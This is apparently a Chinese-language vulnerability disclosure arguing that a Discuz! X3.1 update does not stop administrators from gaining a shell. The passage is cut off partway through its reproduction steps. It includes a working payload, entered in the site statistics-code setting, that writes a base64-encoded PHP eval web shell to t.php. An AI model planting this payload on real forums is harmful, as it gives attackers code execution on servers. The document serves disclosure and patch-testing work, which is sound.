Discuz! X3.1 Release 20140301后台拿shell真的修复了吗

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 之前写的几个后台拿shell,Discuz!忽略了,但新版本Discuz! X3.1 Release 20140301实际上有所加强,但是真的修复了之前提到的问题吗? Discuz!大概做了下面几个改动: 1.统计代码处,对 <? 中的尖括号做了转意“\&lt;”。 2.首页文件名限制了".",有点时,返回【setting_functions_makehtml_indexname_invalid】,防止解析漏洞拿shell,。 3.专题HTML文件的存放目录做了部分限制,如果“template/default/portal”,会提示【专题HTML文件的存放目录只能包含字母、数字、下划线(_)和\,请确认存放目录的合法性】 看似很完美,难道就真的没办法拿到shell嘛,难道真的修复了之前拿shell的方法,其实不然。 ### 详细说明: 前面先说下,既然"<? ?>"和 "<?php ?>" 的被转意了,那就用 <script language="PhP"></script>,经过测试,尖括号未被转意。 下面来重现过程: 1.先上传一张版本图: [<img src="https://images.seebug.org/upload/201403/091349450e4e3dde89fc58cf065f1b1e6e2a2457.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/091349450e4e3dde89fc58cf065f1b1e6e2a2457.jpg) 2. 全局->站点信息->网站第三方统计代码, 里面插入我们要执行的php代码,如下: <script language="PhP">fputs(fopen('t.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));</script> [<img src="https://images.seebug.org/upload/201403/09135053f8bf1bb38471708be9c7712cab8edde4.jpg" alt="2.jpg"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息